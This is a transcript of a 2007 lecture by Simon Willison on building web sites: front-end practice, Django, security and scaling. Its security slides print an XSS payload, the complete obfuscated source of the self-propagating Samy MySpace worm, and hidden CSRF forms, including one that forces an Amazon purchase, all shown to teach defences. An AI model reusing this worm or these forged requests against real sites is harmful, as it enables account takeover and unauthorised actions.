how to build the web

115
How to build the Web Simon Willison 30th November 2007

Upload: simon-willison

Post on 12-May-2015

13.541 views

Category:

Technology


2 download

DESCRIPTION

A guest lecture I gave for the "Internet Technology" course at my old University (Bath). I tried to pull together all of the things I wish I'd been told before I started building things on the Web.

TRANSCRIPT

Page 1: How to build the Web

How to build the WebSimon Willison

30th November 2007

Page 2: How to build the Web

This talk

• Modern client-side engineering

• Server-side engineering and web frameworks

• Web application security

• Building sites that scale

Page 3: How to build the Web

What to build How to build it

Client-sideengineering

Server-sideengineering

Product design

Information architecture

User experience

Social software design

Usability

Marketing

...

Browsers!

Servers!

Page 4: How to build the Web

Client-side engineering

Page 5: How to build the Web

The great myth of client-side development

“It’s way easier than server-side development - after all, it’s just HTML”

Page 6: How to build the Web

That’s hogwash

Page 7: How to build the Web

“Yahoo! Juku is a comprehensive, 3-6 month program to train professional front end developers. The curriculum includes advanced topics in JavaScript, DOM, HTML, CSS, YUI, performance, and accessibility.

Why train raw recruits to this degree? Well, in the San Francisco Bay Area, including the Silicon Valley, it’s hard-as-heck to find good front end programmers and web designers.”

http://developer.yahoo.net/blog/archives/2007/11/the_harvard_of.html

Page 8: How to build the Web

char*f="char*f=%c%s%c;main(){printf(f,34,f,34,10);}%c";main(){printf(f,34,f,34,10);}

Quines

Page 9: How to build the Web

(*O/*_/Cu #%* )pop mark/CuG 4 def/# 2 def%%%%@@P[TX---P\P_SXPY!Ex(mx2ex("SX!Ex4P)Ex=CuG #%* *+Ex=CuG #%*------------------------------------------------------------------*+Ex=CuG #%* POLYGLOT - a program in eight languages 15 February 1991 *+Ex=CuG #%* 10th Anniversary Edition 1 December 2001 *+Ex=CuG #%* Written by Kevin Bungard, Peter Lisle, and Chris Tham *+Ex=CuG #%*------------------------------------------------------------------*QuZ=CuG #%* *+Ex=CuG #%*!Mx)ExQX5ZZ5SSP5n*5X!)Ex+ExPQXH,B+ExP[-9A-9B(g?(gA'UTTER_XYZZXX!X *+CuG #(* *(C # */); /*(C # *) program polyglot (output); (*+C # identification division.C # program-id. polyglot.C #C # data division.C # procedure division.C #C # * ))cleartomark /Bookman-Demi findfont 36 scalefont setfont (C # * (C #C # * hello polyglots$C # main.C # performC /# * ) 2>_$$; echo "hello polyglots"; rm _$$; exit;C # * (C #C *0 ) unless print "hello polyglots\n"; __END__ printC stop run. -*, 'hello polyglots'CC print.C display "hello polyglots". (C */ int i; /*C */ main () { /*C */ i=printf ("hello polyglots\n"); O= &i; return *O; /*C *) (*C *) begin (*C *) writeln ('hello polyglots'); (*C *) (* )C * ) pop 60 360 (C * ) pop moveto (hello polyglots) show (C * ) pop showpage ((C *) end .(* )C)pop% program polyglot. *){*/}

PolyglotsC

PerlPascal

FortranCOBOL

PostScriptbash/sh/csh

x86 assembler

http://ideology.com.au/polyglot/

Page 10: How to build the Web

Rendering engines

Page 11: How to build the Web

Rendering engines

Opera desktopOpera mobileNintendo WiiNintendo DS

SafariiPhone

Nokia Series 60Google Android

FirefoxIce weaselCaminoGalleon

Sadly still 85%of the market

Page 12: How to build the Web

IE is the problem child• Microsoft simply stopped updating it once

they had won the browser wars... IE 6 came out in 2001!

• Still has shaky support for CSS 2.1

• Many JavaScript APIs developed before standards even existed

• Requires a disproportionate amount of development time

• Status of IE 8 is uncertain

Page 13: How to build the Web

Recommendations

• Develop to the standards using Firefox

• The cases where IE deviates from the standards are relatively well understood, and can usually be worked around

• Avoid CSS hacks; conditional comments are your friend<!--[if IE]><link rel="stylesheet" type="text/css" href="/static/ieonly.css"><![endif]-->

Page 14: How to build the Web
Page 15: How to build the Web
Page 16: How to build the Web

Accessibility• Assistive technology thrives on semantic HTML

• <label> elements for forms

• <h1>...<h6> headers for structure

• Avoiding tables for layout

• Watch a video of a screen reader user; they may well browse faster than you do

• Accessibility is much more than just screen readers - colour blindness, motor disorders, learning disabilities, even just poor eyesite

Page 17: How to build the Web

JavaScript

“JavaScript was a rushed little hack for Netscape 2 that was then frozen prematurely

during the browser wars, and evolved significantly only once by ECMA. So its early

flaws were never fixed, and worse, no virtuous cycle of fine-grained community

feedback [...] ever occurred.”

-Brendan Eich

Page 18: How to build the Web

But despite that...

• JavaScript is actually a really neat little language

• Functions are first-class objects

• Lexical closures

• Objects are hash tables

• If you take the time to learn it, it will repay you handsomely

Page 19: How to build the Web
Page 20: How to build the Web

Ajax

Page 21: How to build the Web

February 2005

Page 22: How to build the Web

AJAX v.s. Ajax

“Asynchronous JavaScript + XML”

Page 23: How to build the Web

AJAX v.s. Ajax

“Asynchronous JavaScript + XML”

“Any technique that allows the client to retrieve more data

from the server without reloading the

whole page”

Page 24: How to build the Web

• JavaScript isn't always available

• Security conscious organisations (and users) sometimes disable it

• Some devices may not support it (mobile phones for example)

• Assistive technologies (screen readers) may not play well with it

• Search engine crawlers won't execute it

• Unobtrusive: stuff still works without it!

Unobtrusive JavaScript

Page 25: How to build the Web

• Start with solid markup

• Use CSS to make it look good

• Use JavaScript to enhance the usability of the page

• The content remains accessible no matter what

Progressive enhancement

Page 26: How to build the Web

Unobtrusive examples

Page 27: How to build the Web

• One of the earliest examples of this technique, created by Aaron Boodman (now of Greasemonkey and Google Gears fame)

labels.js

Page 28: How to build the Web
Page 29: How to build the Web
Page 30: How to build the Web

• Once the page has loaded, the JavaScript:

• Finds any label elements linked to a text field

• Moves their text in to the associated text field

• Removes them from the DOM

• Sets up the event handlers to remove the descriptive text when the field is focused

• Clean, simple, reusable

<label for="search">Search</label><input type="text" id="search" name="q">

How it works

Page 31: How to build the Web

• An unobtrusive technique for revealing panels when links are clicked

<ul> <li><a href="#panel1" class="toggle">Panel 1</a></li> <li><a href="#panel2" class="toggle">Panel 2</a></li> <li><a href="#panel3" class="toggle">Panel 3</a></li></ul>

<div id="panel1">...</div><div id="panel2">...</div><div id="panel3">...</div>

easytoggle.js

Page 32: How to build the Web
Page 33: How to build the Web
Page 34: How to build the Web

• When the page has loaded...

• Find all links with class="toggle" that reference an internal anchor

• Collect the elements that are referenced by those anchors

• Hide all but the first

• Set up event handlers to reveal different panels when a link is clicked

• Without JavaScript, links still jump to the right point

How it works

Page 35: How to build the Web

• Large multi-select boxes aren't much fun

• Painful to scroll through

• Easy to lose track of what you have selected

• Django's admin interface uses unobtrusive JavaScript to improve the usability here

Django filter lists

Page 36: How to build the Web
Page 37: How to build the Web
Page 38: How to build the Web

• Ajax is often used to avoid page refreshes

• So...

• Write an app that uses full page refreshes

• Use unobtrusive JS to "hijack" links and form buttons and use Ajax instead

• Jeremy Keith coined the term "Hijax" to describe this

Page 39: How to build the Web

JavaScript libraries

“The bad news: JavaScript is broken.

The good news:It can be fixed with more JavaScript!”

- Geek folk saying

Page 40: How to build the Web

Main contenders

• Prototype

• The Yahoo! User Interface Library

• The Dojo Toolkit

• jQuery

• It’s worth evaluating these in detail, but if you only have time to learn one...

Page 41: How to build the Web

The short answer: use jQuery

Page 42: How to build the Web

Client-side performance

• Relatively new field, pioneered by the performance team at Yahoo!

• A few simple changes can make a huge difference to perceived loading times

• Example tip: serve your static files (CSS, images etc) from a separate domain - that way the cookies from your regular domain won’t slow down the requests

Page 43: How to build the Web
Page 44: How to build the Web

Server-side engineering

Page 45: How to build the Web

URL design

(Yes, I should probably be calling them URIs)

Page 47: How to build the Web

Characteristics ofgood URLs

• “Cool URIs don’t change”

• Guessable

• Hackable

• Readable over the phone

• Reflects the hierarchy of the site and its data

Page 48: How to build the Web

A good URL

• simonwillison.net/2007/Nov/27/thumbnail/

• Short, hackable, no implementation exposed

• No matter what you’re building, including the year can be really useful in allowing you to change your opinion on your URLs later on without breaking old links

Page 49: How to build the Web

The Open Source stack

• The only option I would consider

• Open source means:

• Zero vendor lock-in; many open-source components are interchangeable

• Better support (fix it yourself, or pay someone smart to fix it for you)

• Less bugs and better quality code

Page 50: How to build the Web

Dynamic languages

http://xkcd.com/303/

Page 51: How to build the Web

Dynamic languages

• Social applications in particular are almost impossible to get right first time

• Development only really starts after you’ve launched something and seen what people use it for

• Speed and flexibility of development are critical

• Dynamic languages let you get more done with less lines of code (which means less bugs)

Page 52: How to build the Web

LAMP

• Linux

• Apache

• MySQL

• PHP/Perl/Python

Page 53: How to build the Web

LAMP, evolved

• Linux / FreeBSD / Solaris

• Apache / Lighttpd / nginx / ...

• MySQL / PostgreSQL

• PHP/Perl/Python / Ruby

Page 54: How to build the Web

Web frameworks

• Ruby: Ruby on Rails

• Python: Django, Pylons, TurboGears

• PHP: Symfony, CakePHP, Zend Framework

• Perl: Catalyst, Maypole

Page 55: How to build the Web

Web frameworks

• Ruby: Ruby on Rails

• Python: Django, Pylons, TurboGears

• PHP: Symfony, CakePHP, Zend Framework

• Perl: Catalyst, Maypole

Page 56: How to build the Web

Django

Page 57: How to build the Web

Lawrence, Kansas - 2003

Page 58: How to build the Web
Page 59: How to build the Web

• Two developers

• Two designers

• Around a dozen editorial staff

Page 60: How to build the Web
Page 61: How to build the Web
Page 62: How to build the Web
Page 63: How to build the Web
Page 64: How to build the Web
Page 65: How to build the Web
Page 66: How to build the Web
Page 67: How to build the Web
Page 68: How to build the Web
Page 69: How to build the Web
Page 70: How to build the Web
Page 71: How to build the Web
Page 72: How to build the Web
Page 73: How to build the Web
Page 74: How to build the Web

How do you build a site like lawrence.com?

• Interns - unpaid labour!

• A big relational database

• Newspaper people are baffled by these...

• ... so you need a good interface for it

• And as many development shortcuts as possible

Page 75: How to build the Web

Characteristics

• Clean URLs

• Loosely coupled components

• Designer-friendly templates

• Less code

• The “good bits” from PHP

Page 76: How to build the Web

The Django stack

• HTTP handling

• Models (an ORM)

• Views

• Templates

• Extras

• Admin, RSS framework, generic views...

Page 77: How to build the Web

The Django workflow

• Build the models

• Instant admin! Content people can start adding data

• Writing the views

• Throw the templates to the designers

Page 78: How to build the Web
Page 79: How to build the Web

Open source Django

• Django has been open-source since mid-2005

• The newspaper has been able to hire excellent developers from the community

• The newspaper CMS is sold as Ellington; one of the features is that you can hire your own Django developers to modify it

• Django has been hugely improved by contributions from outside the newspaper

Page 82: How to build the Web
Page 83: How to build the Web

Don’t Repeat Yourself

Page 84: How to build the Web

All frameworks provide:

• A recommended way of laying out code

• Separation of application and presentation logic using a template system

• An ORM, to reduce the amount of code needed to talk to a database

• Reusable components for common tasks

Page 85: How to build the Web

Security

Page 86: How to build the Web

Three key attacks

• SQL injection

• XSS (cross-site scripting)

• CSRF (cross-site request forgery)

Page 87: How to build the Web

SQL injection

Page 88: How to build the Web

• SQL injection is inexcusable

• If the environment you are using doesn’t protect against this for you (through parameterised queries), use a different tool

Page 89: How to build the Web

• The most common security hole on the web

http://example.com/search?q=<script>alert("hello");</script>

You searched for <?php echo $_GET['q']; ?>

• Massive security hole!

Cross-site scripting

Page 90: How to build the Web

XSS attackers can...

• Replace your logo with something obscene

• Steal your user’s authentication cookies

• Re-target login forms to point to a password stealing script

• Perform any action that the user is allowed to perform themselves

• Create self-propagating worms

Page 91: How to build the Web

samy is my herohttp://namb.la/popular/ http://namb.la/popular/tech.html

Page 92: How to build the Web

<div id=mycode style="BACKGROUND: url('javascript:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>

Page 93: How to build the Web

HTML is dangerous

• It’s best not to allow un-trusted users to submit HTML at all

• If you let them submit HTML, you’ll need an industrial grade HTML parser (which emulates browsers, not just the HTML spec) and a very restrictive whitelist

• CSS can include JavaScript, and even regular CSS positioning can be used for phishing

Page 94: How to build the Web

CSRF

• Much less widely understood than XSS...

• ... but almost certainly more common

• Cross-site request forgery attacks allow attackers to force your users to take actions on your site that they didn’t mean to take

• <img src="http://example.com/admin/delete.php?id=5">

• Not just GET; hidden forms allow POST as well

Page 95: How to build the Web

<iframe style="width: 0px; height: 0px; visibility: hidden" name="hidden"></iframe><form name="csrf" action="http://amazon.com/gp/product/handle-buy-box" method="post" target="hidden"><input type="hidden" name="ASIN" value="059600656X" /><input type="hidden" name="offerListingID" value="XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" /></form><script>document.forms.csrf.submit();</script>

http://shiflett.org/blog/2007/mar/my-amazon-anniversary

Page 96: How to build the Web
Page 97: How to build the Web

Defence against CSRF

• You need to know if the form that is being submitted is one that you served up from your own site (as opposed to an evil form created by an attacker)

• Include a hidden form field with a token generated by your site and associated with the logged in user in a non-predictable way

Page 98: How to build the Web

Building sites that scale

Page 99: How to build the Web

Scalability is not performance

Page 100: How to build the Web

Scalability is not performance

Scalable systems increase their performance as new hardware is added, proportional to

the hardware’s capacity

Page 101: How to build the Web

Vertical v.s. horizontal

• Vertical scaling: buy a bigger machine

• More RAM

• More CPU(s)

• “Big iron” costing $100,000+

• Horizontal scaling: buy more machines

• Almost always better than vertical scaling

• But... software must be designed to scale out

Page 102: How to build the Web

“Premature optimisation is the

root of all evil”- Tony Hoare and

Donald Knuth

Page 104: How to build the Web

“Shared nothing”

• Rasmus Lerdorf, the creator of PHP, describes this as a key principle of scaling

• Application servers (web servers running PHP) have no shared state - everything stateful is pushed out to the database layer

• This lets you trivially horizontally scale your application servers behind a load balancer

• Now you just have to scale the data layer...

Page 105: How to build the Web

Four steps to building a scalable data layer

• Add caching

• De-normalise where necessary

• Add database replication

• Add sharding

Page 106: How to build the Web

Caching• You could cache to disk or shared memory...

• ... but you’re better off using memcached

• Distributed key/value in-memory caching system, first developed for LiveJournal

• Facebook, YouTube, Wikipedia, Flickr...obj = memcache.get(obj_id)if not obj: obj = construct_obj_from_database(obj_id) memcache.put(obj_id, obj)return obj

Page 107: How to build the Web

“Normalised datais for sissies”

Cal Henderson, Flickr

• You can get a major speed-up by duplicating some data (e.g. counts) in your database

• Your application logic will need to keep everything in sync

Page 108: How to build the Web

Replication

• Master-slave replication lets you set up copies of the database to accelerate reads

Master

SlaveSlaveSlave

Reads spread across all slaves

Writes all goto master

Page 109: How to build the Web

Replication• Master-master replication provides redundant

masters, but doesn’t really improve write performance (both still have to make the same number of writes)

Master

SlaveSlaveSlave

Reads spread across all slaves

Writes all goto masters

Master

Page 110: How to build the Web

Sharding• Sometimes known as federation

• Users 1-1000 are on database A, 1000-2000 are on database B...

• Often requires a large scale re-write of the system

• Much harder to do in social applications where relationships span multiple databases

• WordPress MU is an interesting case-study

Page 111: How to build the Web
Page 112: How to build the Web

Scalable business models

• Scaling gets a lot easier if you build it in to your business model

• 37signals products (Basecamp, Highrise) shard naturally based on individual customer accounts - and more customers means more money for servers

• Second Life shards by land area, and land has to be bought by users - they’re essentially a 3D web hosting company

Page 113: How to build the Web

Build it on Amazon

• S3 - Simple Storage Service

• Cheap, robust key-value storage of both small and large files

• EC2 - Elastic Compute Cloud

• On-demand instant virtual servers, billed by the hour

• SQS - Simple Queue Service

Page 114: How to build the Web

Thank you!

Page 115: How to build the Web

Thank you!